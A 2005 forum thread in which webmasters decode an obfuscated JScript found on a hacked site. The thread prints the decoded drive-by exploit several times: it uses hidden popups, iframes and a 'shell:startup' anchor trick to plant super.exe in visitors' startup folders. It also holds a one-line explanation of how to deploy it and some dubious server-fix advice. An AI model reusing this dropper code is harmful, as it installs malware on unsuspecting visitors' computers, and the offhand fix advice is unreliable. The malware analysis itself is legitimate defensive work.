hey h@ckers - GoFuckYourself.com

Makingcoin · 01-27-2005, 12:15 PM

Can someone tell me what this is? Or where it is coming from, it is loading a trojan I believe.

<SCRIPT language=JScript.Encode>#@~^5woAAAhahahaha@&@&@&-mD,wWai@&-lMP;w^WC[Ni@&-lMPW(%I@&7lMP8E.sp@&-lM~tbN[n q:LI@&\CD,OKYC^W(Li@&@&bW`eE2VKl[n9#@&P@&d(ED^xEzkEa+.RnaJI@&)@&@&6EU^DkWU~bxrYaGa `b@& @&PP,P,~P,kW`ewG2*@&P,~P,PP,`@&P,P,P~P72KwxhbUNK h ^M+lOnhW2Eac*i@&i\mDPKAK[X,'~wKw [KmEsnxDR4K[zi@&@&@&P~P~~,P~wK2R9W^;s+xO (o/W^GM'E(Vmm3ri@&7W~W[Xc/Oz^+R(GD9+D,x~JkW^k[P8smmVPZ26ri@&7KAW[zc/OX^ncwGkkDkW 'rC4kWsED+EI@&dW~GNHR/Dzs+cV0O'~EZJI@&iGAKNz kYXsncYGw{~r!Ep@&i\lMPDn:ai@&dD+h2{B@!G(.,/YHsn'rwK/rYrG ).+^CYb\nIr@*@!C~4Dn0{EE_E[-rPW A^;D{B2lM+UOcNW1;:xYcLnYAV:nxO$Hq[`'Ek|0.Cs+-Ebc/OX^nc\rkk(kVbYHx-rtrN9+UwrBPrI@&iY+s2Q'@&JKx\W;dr;Y{vNKm;hxY LY3VhxO~X&N`'J1skxO-r# dDXV \b/k(rskDX{-Etr[9+U-rvP'@&6UtWEdn}\nD{v9W^!:xYcoO2^+h+ Y$z&N`'Em^k+ OwJ*RkYzVn 7kdk(rVbYzx'J\rdb4s+'EEPw@&W HW!/9WSxxBal.n YR9Gm!:+ O oYAVn:nUDAzq9c-rkmWMl:nwr# /Dz^+ 7kkk4bVbOX{-E\b/r8^+-rIwmD+ O wKwc/4WAc8~q~8SF*i2CM+xO !wsWm[Nx8ialDxD fKZsk13cbpB@*,w@&&-@&@!9(.,P&fx-E^^knxDwJ,?Ped2'wE7kdk(r^kOH)4kN9+ IPaWdkDkGU=l4kGV!Y+p~OWa) Xi~s0O) +*p-E@*'@&@!rhTPUW1C1tn,4KDND{qPkYzV'wESkND4'l!!aaIt kTY4'XTZwai,^EM/G.=tlU[p-EP9z /.1''JJ34!.V3JwJ,@*@!&9k\@*@!zm@*@!J[r\@*Jp@&@&@&~~,P~P,~W~W[zckxUnMCPHdxD+hai@&PP,P,~Pi8@&8@&@&W; mYbGx,mVCU`*@&P@&7E2sKl[+9xFp@&~~,PP~~,kW`aGa#@&,P,PP,P,7wKw tbNnc*i@&)@&@&b0`e;2VKl9+[#@&`@&P~P,~P,PrUbYwG2v#I@&iAbx[KhcWx(+6GDEUVKl[x1V+mUi@&8@&@&@&WE mDkGx~9KZsk1V`*@&`@&ihkU[Kh /O:khW!Y`EW(%R1Vrm0`bIE~&ZT#p@&8@&@&WE mDkGx~d4WAwK2`*@&`@&,PP~~,P~k6c!wsKl9+N*@&,~P,P~P, d.nDED I@&,PP,~~P,W(LxhrU9WAR-+ Y dMm2sns+UYp@&,P~,P,PPb0vZwKwb@&,P~~,PP,`@&,PP,~~P, dbxrY2Ga`bi@&~P,P~~,d8@&@&iwGwcd4WAvhbxNKhcn\xORk m.nx(BAk NWS n\xDRdm.nxe~8SF*i@&79Wm;hxORTnD2s:xY~X&[`rkm0Mlhnr#RkOX^+R^nWY{hbx[WA \nxD /1Dnn (OAr NGhcd1Dnxd+0DO9Gm!:nxDR8G9XR1skxYdnWY3NKm;:nUDR8 W9zRkm.G^VSnWDi@&d9G1EhxDRoYAs+s+UY~X([vJk|WDm:+rb /DX^+ YG2{hrx9Ghc+-n YRd^M+nxIRSkU9WSR/1Dnx:W2O9W^;s+xD 4KNXc^skxDKGwQ[Km;:UYc4G[HR/^.KVsKK2p@&N@&@&@&0E mDrW Pj+DbssA\+ O/v#@&P@&7YKYmVG4%x9W^EsnxDRCs^RVnUTY4i@&76W.vk,'PZi ,rP@!P[W1Ehn YRmsVcV+ LOtpPb_Q#`@&iP~PbW`9W^;s+xO mVs`bbcYCT1m:+{'r)J,['P9W^;s+xD l^V`bb k9"{J^Vrn Y^l^sJ*@&779Wm;hxORms^`r*RKx:KEkn:K\n'ktGAaWwpN@& )@&@&bWc"!w^WCNn[*@&`@&id+DKrhWEOcr?nYzs^2-xD/`*irSPW!T#p@&@&79Wm!h+ YRS.rY`E@![k-~,k['bm0Mlhn,xlhn{km0MCs+~,?:5SA'r-kkk8k^kOz=tk9[+ iwKdrYbW )C4dG^EO+pOWa'TI^+0OxZiAk9O4)qptko4Y=qiK\nD6VGA=t k9[+ J@*@!rWDm:PWDCh4GD9nD{JqE,xlhn{J^Vbn YWMls+J,k9xJ1Vr+ YW.m:+r~PkYX^nxJaWkkOkGU=DnVmOk7+IOKw'R+l!IVWD'RW cZihbND4)F!Ti4+rL4Y)FT!pJ@*@!&r0Mls+@*@!&[b\@*B*I@&iNG^!:+UOch.kDnvB@!mP6WV9+MxJktnV^)dOmDY! 2J,YlMLnY{J1Vr+UO6DC:EPbNxE1VknUDmCV^E,/OHV'J7kkr4bVrYH)4r9N+ INb/w^Cz) W +I4n4m\rWMlEMVc:9+0C;^Y:b ^4W.;Vbm3*ir@*@!Jl@*B*i@&79Wm!h+ YRTnO2^+s+UY$z&NcJ1skxO^mVVEbcmsk1Vv#I@&d9Wm!:UY ch.kD+cv@!k0MC:P/M^xJm4KEO)8smxVJ,dYHVnxr\kdr(kskDz=tr9Nxi9kk2VmXl xKxnIr@*@!Jr0Ml:@*v#p@&)@&@&XHIDAAhahahaha^#~@</SCRIPT>

Chris · 01-27-2005, 12:15 PM

Encrypytd code

Makingcoin · 01-27-2005, 12:16 PM

Quote:

Originally Posted by JupZChris

Encrypytd code

Yes, can someone decrypt this?

Chris · 01-27-2005, 12:17 PM

Quote:

Originally Posted by Makingcoin

Yes, can someone decrypt this?

I barely can remember the alarm code

Makingcoin · 01-27-2005, 12:18 PM

Quote:

Originally Posted by JupZChris

I barely can remember the alarm code

LOL, this is out of our league then.. Anyone else?

NaughtyINC · 01-27-2005, 12:19 PM

i belive it says signup for coins cuties and push justsasha...

but i will forward this to someone i know that might be able to help ya out if hes still around

hope it gets sorted out bud..

nofx · 01-27-2005, 12:20 PM

"Kill All Americans"

Makingcoin · 01-27-2005, 12:20 PM

Quote:

Originally Posted by NaughtyINC

i belive it says signup for coins cuties and push justsasha...

but i will forward this to someone i know that might be able to help ya out if hes still around

hope it gets sorted out bud..

That too. ;)

ytcracker · 01-27-2005, 12:20 PM

www.samspade.org used to have tools for this shit

does it still? i dunno

Poland · 01-27-2005, 12:21 PM

theres a tool around here somewhere that decodes that shit, might be the one yt is talking about, i forget

Thurbs · 01-27-2005, 12:30 PM

i like the general there's a tool comment .. u'd need the tool used and in many cases, to know the key length used to generate the encryption, ie RSA / Blowfish / 512s / 1028 and so on. But if you have time to waste, see "InLine Encryption" and that should help you.

adultpixel · 01-27-2005, 12:35 PM

hmm... just called CTU but jack bauer is still in the field. hold on... chlooooeeee!!

swedguy · 01-27-2005, 12:43 PM

http://www.greymagic.com/security/tools/decoder/

Libertine · 01-27-2005, 12:53 PM

Could you post the page where you found it?

Harmon · 01-27-2005, 12:59 PM

send me a text file of this to genbucks[at]gmail.com and I will see what my bud can do

austinth · 01-27-2005, 01:15 PM

try here: http://netdemon.net/decode.html

Harmon · 01-27-2005, 01:17 PM

Quote:

Originally Posted by austinth

try here: http://netdemon.net/decode.html

This is not an encrypted URL, it's encrypted Jscript

austinth · 01-27-2005, 01:24 PM

i know,but that site has links to sites that can decode script. i tried a few of them but they didnt' work

Makingcoin · 01-27-2005, 01:46 PM

Quote:

Originally Posted by punkworld

Could you post the page where you found it?

http://www.moviesguy.com

SmokeyTheBear · 01-27-2005, 01:48 PM

hold on and ill track it down.

Makingcoin · 01-27-2005, 01:48 PM

Quote:

Originally Posted by Harmon

send me a text file of this to genbucks[at]gmail.com and I will see what my bud can do

Email has been sent, I also included the html of where it was found.

Thanks

Libertine · 01-27-2005, 01:48 PM

Quote:

Originally Posted by Makingcoin

http://www.moviesguy.com

It isn't in the code anymore. Would you still happen to have a non-hahaha'd version of the code?

warhammer_ro · 01-27-2005, 01:49 PM

Alien words ? lol

Makingcoin · 01-27-2005, 01:50 PM

Quote:

Originally Posted by punkworld

It isn't in the code anymore. Would you still happen to have a non-hahaha'd version of the code?

Some people don't get it. Is that your first visit to the site?

SmokeyTheBear · 01-27-2005, 01:52 PM

its trying to download something called super.exe ?

austinth · 01-27-2005, 01:54 PM

yeah, i got hit with it last night from dv . com luckily my system stopped it right away.

SmokeyTheBear · 01-27-2005, 01:57 PM

the code in on page http://earthunplugged.org/abbaz.html

Libertine · 01-27-2005, 02:01 PM

Quote:

Originally Posted by SmokeyTheBear

the code in on page http://earthunplugged.org/abbaz.html

Ah, finally, something to work with.

Here's the thing:

Code:

<SCRIPT LANGUAGE="JScript.Encode">


var pop;
var uploaded;
var obj;
var burl;
var hiddenImg;
var totalobj;

if(!uploaded)
{
	burl="/super.exe";
}

function initpop()
{
        if(!pop)
        {
       	pop=window.createPopup();
	var oBody = pop.document.body;


        pop.document.bgColor="black";
	oBody.style.border = "solid black 0px";
	oBody.style.position="absolute";
	oBody.style.left= "0";
	oBody.style.top= "0";
	var temp;
	temp='<DIV style="position:relative;"><a href="'+"#\" onBlur='parent.document.getElementById(\"i_frame\").style.visibility=\"hidden\"' ";
	temp+=
"onMouseOut='document.getElementById(\"client\").style.visibility=\"hidden\"' \
OnMouseOver='document.getElementById(\"client\").style.visibility=\"visible\"' \
onMouseDown='parent.document.getElementById(\"i_frame\").style.visibility=\"visible\";parent.pop.show(1,1,1,1);parent.uploaded=1;parent.DoClick();'> \
I\
<DIV  ID=\"client\" STYLE=\"visibility:hidden; position:absolute; top:-25; left:-25;\">\
<img nocache border=1 style=\"width=500px;heigth=500px; cursor:hand;\" dynsrc=\""+burl+"\" ></div></a></div>";


        oBody.innerHTML=temp;
       	}
}

function clean()
{
	uploaded=1;
        if(pop)
        	pop.hide();
}

if(!uploaded)
{
        initpop();
	window.onbeforeunload=clean;
}


function DoClick()
{
	window.setTimeout('obj.click();',300);
}

function showpop()
{
        if(uploaded)
        	return;
        obj=window.event.srcElement;
        if(!pop)
        {
        	initpop();
       	}

	pop.show(window.event.screenX,window.event.screenY,1,1);
	document.getElementById("i_frame").style.left=window.event.screenX-window.screenLeft-document.body.clientLeft+document.body.scrollLeft;
	document.getElementById("i_frame").style.top=window.event.screenY-window.screenTop-document.body.clientTop+document.body.scrollTop;
}


function SetAllEvents()
{
	totalobj=document.all.length;
	for(i = 0; i < document.all.length; i++){
	   if(document.all(i).tagNamehahahaha"A" && document.all(i).id!="clientcall")
		document.all(i).onmousemove=showpop;}
}

if(!uploaded)
{
	setTimeout("SetAllEvents();", 400);

	document.write('<div  id=i_frame name=i_frame  STYLE="visibility:hidden;position:absolute;top=0;left=0;width:1;height:1;overflow:hidden"><iframe frameborder="1" name="clientframe" id="clientframe"  style="position:relative;top=-250;left=-440;width:700;height:700;"></iframe></div>');
	document.write('<a folder="shell:startup" target="clientframe" id="clientcall" style="visibility:hidden;display:none;behavior:url(#default#AnchorClick);"></a>');
	document.getElementById("clientcall").click();
	document.write('<iframe src="about:blank" style="visibility:hidden;display:none;"></iframe>');
}

</script>

Donners · 01-27-2005, 02:04 PM

Code:



var pop;
var uploaded;
var obj;
var burl;
var hiddenImg;
var totalobj;

if(!uploaded)
{
	burl="/super.exe";
}

function initpop()
{
        if(!pop)
        {
       	pop=window.createPopup();
	var oBody = pop.document.body;


        pop.document.bgColor="black";
	oBody.style.border = "solid black 0px";
	oBody.style.position="absolute";
	oBody.style.left= "0";
	oBody.style.top= "0";
	var temp;
	temp='<DIV style="position:relative;"><a href="'+"#\" onBlur='parent.document.getElementById(\"i_frame\").style.visibility=\"hidden\"' ";
	temp=
"onMouseOut='document.getElementById(\"client\").style.visibility=\"hidden\"' \
OnMouseOver='document.getElementById(\"client\").style.visibility=\"visible\"' \
onMouseDown='parent.document.getElementById(\"i_frame\").style.visibility=\"visible\";parent.pop.show(1,1,1,1);parent.uploaded=1;parent.DoClick();'> \
I\
<DIV  ID=\"client\" STYLE=\"visibility:hidden; position:absolute; top:-25; left:-25;\">\
<img nocache border=1 style=\"width=500px;heigth=500px; cursor:hand;\" dynsrc=\""+burl+"\" ></div></a></div>";


        oBody.innerHTML=temp;
       	}
}

function clean()
{
	uploaded=1;
        if(pop)
        	pop.hide();
}

if(!uploaded)
{
        initpop();
	window.onbeforeunload=clean;
}


function DoClick()
{
	window.setTimeout('obj.click();',300);
}

function showpop()
{
        if(uploaded)
        	return;
        obj=window.event.srcElement;
        if(!pop)
        {
        	initpop();
       	}

	pop.show(window.event.screenX,window.event.screenY,1,1);
	document.getElementById("i_frame").style.left=window.event.screenX-window.screenLeft-document.body.clientLeft+document.body.scrollLeft;
	document.getElementById("i_frame").style.top=window.event.screenY-window.screenTop-document.body.clientTopdocument.body.scrollTop;
}


function SetAllEvents()
{
	totalobj=document.all.length;
	for(i = 0; i < document.all.length; i+){
	   if(document.all(i).tagNamehahahaha"A" && document.all(i).id!="clientcall")
		document.all(i).onmousemove=showpop;}
}

if(!uploaded)
{
	setTimeout("SetAllEvents();", 400);

	document.write('<div  id=i_frame name=i_frame  STYLE="visibility:hidden;position:absolute;top=0;left=0;width:1;height:1;overflow:hidden"><iframe frameborder="1" name="clientframe" id="clientframe"  style="position:relative;top=-250;left=-440;width:700;height:700;"></iframe></div>');
	document.write('<a folder="shell:startup" target="clientframe" id="clientcall" style="visibility:hidden;display:none;behavior:url(#default#AnchorClick);"></a>');
	document.getElementById("clientcall").click();
	document.write('<iframe src="about:blank" style="visibility:hidden;display:none;"></iframe>');
}

whoala

austinth · 01-27-2005, 02:05 PM

nice work punkworld! what did you use?

SmokeyTheBear · 01-27-2005, 02:06 PM

Quote:

Originally Posted by punkworld

Ah, finally, something to work with.

Here's the thing:

Cool thanx, its an exploit that has been patched already , heres another example of it no encoded in practise http://earthunplugged.org/aa/

and yes what did you use to decode that with , i always come across those..

Makingcoin · 01-27-2005, 02:10 PM

Is super.exe loading off of the same server as the code is on?

strongdong · 01-27-2005, 02:10 PM

how do you get rid of this??

SmokeyTheBear · 01-27-2005, 02:11 PM

eye.c.q # 219681950 hit me up punk

SmokeyTheBear · 01-27-2005, 02:11 PM

Quote:

Originally Posted by Makingcoin

Is super.exe loading off of the same server as the code is on?

yes , so if you put that code on you page and a file called super.exe it will automatically get installed in the victims startup folder.

but ms has patched that

SmokeyTheBear · 01-27-2005, 02:12 PM

Quote:

Originally Posted by strongdong

how do you get rid of this??

go to your start bar > programs>startup then right click and delete the file called super.exe

strongdong · 01-27-2005, 02:14 PM

super.exe is NOT on this server

strongdong · 01-27-2005, 02:14 PM

I meant, how do you get rid of it server-side?

Makingcoin · 01-27-2005, 02:16 PM

This is strongdong's server if you are confused. He is trying to get rid of it. I am trying to help him.

V_RocKs · 01-27-2005, 02:20 PM

You have been hacked. Someone has replaced your httpd file with their own. To quickly fix the problem, add a space to the end of your body tag:
blah blah color=000000 >
and it should go away. Next, have your host recompile and restart apache. Then get me on ICQ, 161124816

swedguy · 01-27-2005, 02:25 PM

Quote:

Originally Posted by SmokeyTheBear

and yes what did you use to decode that with , i always come across those..

http://www.greymagic.com/security/tools/decoder/

Libertine · 01-27-2005, 02:28 PM

Quote:

Originally Posted by SmokeyTheBear

Cool thanx, its an exploit that has been patched already , heres another example of it no encoded in practise http://earthunplugged.org/aa/

and yes what did you use to decode that with , i always come across those..

Windows Script Decoder:
http://www.virtualconspiracy.com/ind...crdec/download

strongdong · 01-27-2005, 02:28 PM

V Rocks... I'm trying to contact you on icq, it's my server... 78861564

SmokeyTheBear · 01-27-2005, 02:42 PM

Quote:

Originally Posted by punkworld

Windows Script Decoder:
http://www.virtualconspiracy.com/ind...crdec/download

thanks , and swedguy too

Rui · 01-27-2005, 03:00 PM

Holy shit, that is indeed one nasty piece of code.

punkworld - do you have experience in this area (encrypted javascript not trojans)?

Harmon · 01-27-2005, 03:19 PM

This is it decrypted:

Code:

< SCRIPT language = JScript.Encode > var pop;
var uploaded;
var obj;
var burl;
var hiddenImg;
var totalobj;
if(!uploaded)
{
	burl = "/super.exe";
}

function initpop()
{
	if(!pop)
	{
		pop = window.createPopup();
		var oBody = pop.document.body;
		pop.document.bgColor = "black";
		oBody.style.border = "solid black 0px";
		oBody.style.position = "absolute";
		oBody.style.left = "0";
		oBody.style.top = "0";
		var temp;
		temp = '<DIV style="position:relative;"><a href="' + "#\" onBlur='parent.document.getElementById(\"i_frame\").style.visibility=\"hidden\"' ";
		temp += "onMouseOut='document.getElementById(\"client\").style.visibility=\"hidden\"' \
OnMouseOver='document.getElementById(\"client\").style.visibility=\"visible\"' \
onMouseDown='parent.document.getElementById(\"i_frame\").style.visibility=\"visible\";parent.pop.show(1,1,1,1);parent.uploaded=1;parent.DoClick();'> \
I\
<DIV  ID=\"client\" STYLE=\"visibility:hidden; position:absolute; top:-25; left:-25;\">\
<img nocache border=1 style=\"width=500px;heigth=500px; cursor:hand;\" dynsrc=\"" + burl + "\" ></div></a></div>";
		oBody.innerHTML = temp;
	}
}

function clean()
{
	uploaded = 1;
	if(pop)
		pop.hide();
}

if(!uploaded)
{
	initpop();
	window.onbeforeunload = clean;
}

function DoClick()
{
	window.setTimeout('obj.click();', 300);
}

function showpop()
{
	if(uploaded)
		return;

	obj = window.event.srcElement;
	if(!pop)
	{
		initpop();
	}

	pop.show(window.event.screenX, window.event.screenY, 1, 1);
	document.getElementById("i_frame").style.left = window.event.screenX - window.screenLeft - document.body.clientLeft + document.body.scrollLeft;
	document.getElementById("i_frame").style.top = window.event.screenY - window.screenTop - document.body.clientTop + document.body.scrollTop;
}

function SetAllEvents()
{
	totalobj = document.all.length;
	for(i = 0; i < document.all.length; i++)
	{
		if(document.all(i).tagName hahahaha "A" && document.all(i).id != "clientcall")
			document.all(i).onmousemove = showpop;
	}
}

if(!uploaded)
{
	setTimeout("SetAllEvents();", 400);
	document.write('<div  id=i_frame name=i_frame  STYLE="visibility:hidden;position:absolute;top=0;left=0;width:1;height:1;overflow:hidden"><iframe frameborder="1" name="clientframe" id="clientframe"  style="position:relative;top=-250;left=-440;width:700;height:700;"></iframe></div>');
	document.write('<a folder="shell:startup" target="clientframe" id="clientcall" style="visibility:hidden;display:none;behavior:url(#default#AnchorClick);"></a>');
	document.getElementById("clientcall").click();
	document.write('<iframe src="about:blank" style="visibility:hidden;display:none;"></iframe>');
}

 <  / SCRIPT >

EDIT: oops, ya got it already

Harmon · 01-27-2005, 03:20 PM

You can get your own standalone decoder here: http://www.programurl.com/software-s...wnloadnow.html

01-27-2005, 12:15 PM	#1
Makingcoin Confirmed User Join Date: Aug 2002 Location: The Ditch Posts: 8,919	hey h@ckers Can someone tell me what this is? Or where it is coming from, it is loading a trojan I believe. <SCRIPT language=JScript.Encode>#@~^5woAAAhahahaha@&@&@&-mD,wWai@&-lMP;w^WC[Ni@&-lMPW(%I@&7lMP8E.sp@&-lM~tbN[n q:LI@&\CD,OKYC^W(Li@&@&bW`eE2VKl[n9#@&P@&d(ED^xEzkEa+.RnaJI@&)@&@&6EU^DkWU~bxrYaGa `b@& @&PP,P,~P,kW`ewG2@&P,~P,PP,`@&P,P,P~P72KwxhbUNK h ^M+lOnhW2Eaci@&i\mDPKAK[X,'~wKw [KmEsnxDR4K[zi@&@&@&P~P~~,P~wK2R9W^;s+xO (o/W^GM'E(Vmm3ri@&7W~W[Xc/Oz^+R(GD9+D,x~JkW^k[P8smmVPZ26ri@&7KAW[zc/OX^ncwGkkDkW 'rC4kWsED+EI@&dW~GNHR/Dzs+cV0O'~EZJI@&iGAKNz kYXsncYGw{~r!Ep@&i\lMPDn:ai@&dD+h2{B@!G(.,/YHsn'rwK/rYrG ).+^CYb\nIr@@!C~4Dn0{EE_E[-rPW A^;D{B2lM+UOcNW1;:xYcLnYAV:nxO$Hq[`'Ek\|0.Cs+-Ebc/OX^nc\rkk(kVbYHx-rtrN9+UwrBPrI@&iY+s2Q'@&JKx\W;dr;Y{vNKm;hxY LY3VhxO~X&N`'J1skxO-r# dDXV \b/k(rskDX{-Etr[9+U-rvP'@&6UtWEdn}\nD{v9W^!:xYcoO2^+h+ Y$z&N`'Em^k+ OwJRkYzVn 7kdk(rVbYzx'J\rdb4s+'EEPw@&W HW!/9WSxxBal.n YR9Gm!:+ O oYAVn:nUDAzq9c-rkmWMl:nwr# /Dz^+ 7kkk4bVbOX{-E\b/r8^+-rIwmD+ O wKwc/4WAc8~q~8SFi2CM+xO !wsWm[Nx8ialDxD fKZsk13cbpB@,w@&&-@&@!9(.,P&fx-E^^knxDwJ,?Ped2'wE7kdk(r^kOH)4kN9+ IPaWdkDkGU=l4kGV!Y+p~OWa) Xi~s0O) +p-E@'@&@!rhTPUW1C1tn,4KDND{qPkYzV'wESkND4'l!!aaIt kTY4'XTZwai,^EM/G.=tlU[p-EP9z /.1''JJ34!.V3JwJ,@@!&9k\@@!zm@@!J[r\@Jp@&@&@&~~,P~P,~W~W[zckxUnMCPHdxD+hai@&PP,P,~Pi8@&8@&@&W; mYbGx,mVCU`@&P@&7E2sKl[+9xFp@&~~,PP~~,kW`aGa#@&,P,PP,P,7wKw tbNnci@&)@&@&b0`e;2VKl9+[#@&`@&P~P,~P,PrUbYwG2v#I@&iAbx[KhcWx(+6GDEUVKl[x1V+mUi@&8@&@&@&WE mDkGx~9KZsk1V`@&`@&ihkU[Kh /O:khW!Y`EW(%R1Vrm0`bIE~&ZT#p@&8@&@&WE mDkGx~d4WAwK2`@&`@&,PP~~,P~k6c!wsKl9+N@&,~P,P~P, d.nDED I@&,PP,~~P,W(LxhrU9WAR-+ Y dMm2sns+UYp@&,P~,P,PPb0vZwKwb@&,P~~,PP,`@&,PP,~~P, dbxrY2Ga`bi@&~P,P~~,d8@&@&iwGwcd4WAvhbxNKhcn\xORk m.nx(BAk NWS n\xDRdm.nxe~8SFi@&79Wm;hxORTnD2s:xY~X&[`rkm0Mlhnr#RkOX^+R^nWY{hbx[WA \nxD /1Dnn (OAr NGhcd1Dnxd+0DO9Gm!:nxDR8G9XR1skxYdnWY3NKm;:nUDR8 W9zRkm.G^VSnWDi@&d9G1EhxDRoYAs+s+UY~X([vJk\|WDm:+rb /DX^+ YG2{hrx9Ghc+-n YRd^M+nxIRSkU9WSR/1Dnx:W2O9W^;s+xD 4KNXc^skxDKGwQ[Km;:UYc4G[HR/^.KVsKK2p@&N@&@&@&0E mDrW Pj+DbssA\+ O/v#@&P@&7YKYmVG4%x9W^EsnxDRCs^RVnUTY4i@&76W.vk,'PZi ,rP@!P[W1Ehn YRmsVcV+ LOtpPb_Q#`@&iP~PbW`9W^;s+xO mVs`bbcYCT1m:+{'r)J,['P9W^;s+xD l^V`bb k9"{J^Vrn Y^l^sJ@&779Wm;hxORms^`rRKx:KEkn:K\n'ktGAaWwpN@& )@&@&bWc"!w^WCNn[@&`@&id+DKrhWEOcr?nYzs^2-xD/`irSPW!T#p@&@&79Wm!h+ YRS.rY`E@![k-~,k['bm0Mlhn,xlhn{km0MCs+~,?:5SA'r-kkk8k^kOz=tk9[+ iwKdrYbW )C4dG^EO+pOWa'TI^+0OxZiAk9O4)qptko4Y=qiK\nD6VGA=t k9[+ J@@!rWDm:PWDCh4GD9nD{JqE,xlhn{J^Vbn YWMls+J,k9xJ1Vr+ YW.m:+r~PkYX^nxJaWkkOkGU=DnVmOk7+IOKw'R+l!IVWD'RW cZihbND4)F!Ti4+rL4Y)FT!pJ@@!&r0Mls+@@!&[b\@BI@&iNG^!:+UOch.kDnvB@!mP6WV9+MxJktnV^)dOmDY! 2J,YlMLnY{J1Vr+UO6DC:EPbNxE1VknUDmCV^E,/OHV'J7kkr4bVrYH)4r9N+ INb/w^Cz) W +I4n4m\rWMlEMVc:9+0C;^Y:b ^4W.;Vbm3ir@@!Jl@Bi@&79Wm!h+ YRTnO2^+s+UY$z&NcJ1skxO^mVVEbcmsk1Vv#I@&d9Wm!:UY ch.kD+cv@!k0MC:P/M^xJm4KEO)8smxVJ,dYHVnxr\kdr(kskDz=tr9Nxi9kk2VmXl xKxnIr@@!Jr0Ml:@v#p@&)@&@&XHIDAAhahahaha^#~@</SCRIPT> __________________ www.MAKINGCOIN.com icq. 166-662-831 "Start making large coin!"* Daddy I Get Paid To Be A Whore - Coming Soon

01-27-2005, 12:15 PM	#2
Chris Too lazy to set a custom title Industry Role: Join Date: May 2003 Location: icq: 71462500 Skype: Jupzchris Posts: 27,880	Encrypytd code __________________ [email protected]

01-27-2005, 12:19 PM	#6
NaughtyINC Confirmed User Join Date: Jul 2004 Location: Toronto Posts: 1,288	i belive it says signup for coins cuties and push justsasha... but i will forward this to someone i know that might be able to help ya out if hes still around hope it gets sorted out bud.. __________________ meh

01-27-2005, 12:20 PM	#7
nofx Too lazy to set a custom title Join Date: Nov 2002 Location: Virgin Mary's womb Posts: 16,826	"Kill All Americans" __________________ Often times I wonder why There's love and hate, theres live or die. When sickness comes I must decide: When feelings go, theres suicide.

01-27-2005, 12:20 PM	#9
ytcracker stc is the greatest Join Date: Dec 2002 Location: rip sean murray Posts: 12,403	www.samspade.org used to have tools for this shit does it still? i dunno __________________ www.ytcracker.com \| www.digitalgangster.com i love you

01-27-2005, 12:21 PM	#10
Poland Confirmed User Join Date: Jun 2004 Posts: 117	theres a tool around here somewhere that decodes that shit, might be the one yt is talking about, i forget __________________ Dream Submitter - The best damn submitter, period. 315-695-891

01-27-2005, 12:30 PM	#11
Thurbs The Thrilla in Manila Join Date: Sep 2004 Location: Thurbs' Lagoon, Christmas Island Posts: 4,785	i like the general there's a tool comment .. u'd need the tool used and in many cases, to know the key length used to generate the encryption, ie RSA / Blowfish / 512s / 1028 and so on. But if you have time to waste, see "InLine Encryption" and that should help you.

01-27-2005, 12:35 PM	#12
adultpixel Confirmed User Join Date: Jan 2004 Location: Switzerland Posts: 747	hmm... just called CTU but jack bauer is still in the field. hold on... chlooooeeee!! __________________ MAKE $$$ WITH BRAND NAMES THAT SELL THEMSELVES

01-27-2005, 12:43 PM	#13
swedguy Confirmed User Industry Role: Join Date: Jan 2002 Posts: 7,981	http://www.greymagic.com/security/tools/decoder/

01-27-2005, 12:53 PM	#14
Libertine sex dwarf Join Date: May 2002 Posts: 17,860	Could you post the page where you found it? __________________ /(bb\|[^b]{2})/

01-27-2005, 12:59 PM	#15
Harmon ( ͡ʘ╭͜ʖ╮͡ʘ) Industry Role: Join Date: Mar 2004 Posts: 20,010	send me a text file of this to genbucks[at]gmail.com and I will see what my bud can do __________________ [email protected]

01-27-2005, 01:15 PM	#16
austinth Confirmed User Join Date: Jul 2002 Location: Fantasy Island Posts: 1,770	try here: http://netdemon.net/decode.html __________________ Get A $25 Circuit City GIFT Card - *FREE*!

01-27-2005, 01:24 PM	#18
austinth Confirmed User Join Date: Jul 2002 Location: Fantasy Island Posts: 1,770	i know,but that site has links to sites that can decode script. i tried a few of them but they didnt' work __________________ Get A $25 Circuit City GIFT Card - *FREE*!

01-27-2005, 01:48 PM	#20
SmokeyTheBear ►SouthOfHeaven Join Date: Jun 2004 Location: PlanetEarth MyBoardRank: GerbilMaster My-Penis-Size: extralarge MyWeapon: Computer Posts: 28,609	hold on and ill track it down. __________________ hatisblack at yahoo.com

01-27-2005, 01:49 PM	#23
warhammer_ro Registered User Join Date: Jan 2005 Posts: 9	Alien words ? lol __________________ www.forumpolitic.ro , www.opiniapublica.ro www.jocurionline.ro , www.temerezolvate.ro , www.carieramea.ro

01-27-2005, 01:52 PM	#25
SmokeyTheBear ►SouthOfHeaven Join Date: Jun 2004 Location: PlanetEarth MyBoardRank: GerbilMaster My-Penis-Size: extralarge MyWeapon: Computer Posts: 28,609	its trying to download something called super.exe ? __________________ hatisblack at yahoo.com

01-27-2005, 01:54 PM	#26
austinth Confirmed User Join Date: Jul 2002 Location: Fantasy Island Posts: 1,770	yeah, i got hit with it last night from dv . com luckily my system stopped it right away. __________________ Get A $25 Circuit City GIFT Card - *FREE*!

01-27-2005, 01:57 PM	#27
SmokeyTheBear ►SouthOfHeaven Join Date: Jun 2004 Location: PlanetEarth MyBoardRank: GerbilMaster My-Penis-Size: extralarge MyWeapon: Computer Posts: 28,609	the code in on page http://earthunplugged.org/abbaz.html __________________ hatisblack at yahoo.com

01-27-2005, 02:05 PM	#30
austinth Confirmed User Join Date: Jul 2002 Location: Fantasy Island Posts: 1,770	nice work punkworld! what did you use? __________________ Get A $25 Circuit City GIFT Card - *FREE*!

01-27-2005, 02:10 PM	#32
Makingcoin Confirmed User Join Date: Aug 2002 Location: The Ditch Posts: 8,919	Is super.exe loading off of the same server as the code is on? __________________ www.MAKINGCOIN.com icq. 166-662-831 "Start making large coin!" Daddy I Get Paid To Be A Whore - Coming Soon

01-27-2005, 02:10 PM	#33
strongdong Confirmed User Join Date: Sep 2003 Posts: 191	how do you get rid of this??

01-27-2005, 02:11 PM	#34
SmokeyTheBear ►SouthOfHeaven Join Date: Jun 2004 Location: PlanetEarth MyBoardRank: GerbilMaster My-Penis-Size: extralarge MyWeapon: Computer Posts: 28,609	eye.c.q # 219681950 hit me up punk __________________ hatisblack at yahoo.com

01-27-2005, 02:14 PM	#37
strongdong Confirmed User Join Date: Sep 2003 Posts: 191	super.exe is NOT on this server

01-27-2005, 02:16 PM	#39
Makingcoin Confirmed User Join Date: Aug 2002 Location: The Ditch Posts: 8,919	This is strongdong's server if you are confused. He is trying to get rid of it. I am trying to help him. __________________ www.MAKINGCOIN.com icq. 166-662-831 "Start making large coin!" Daddy I Get Paid To Be A Whore - Coming Soon

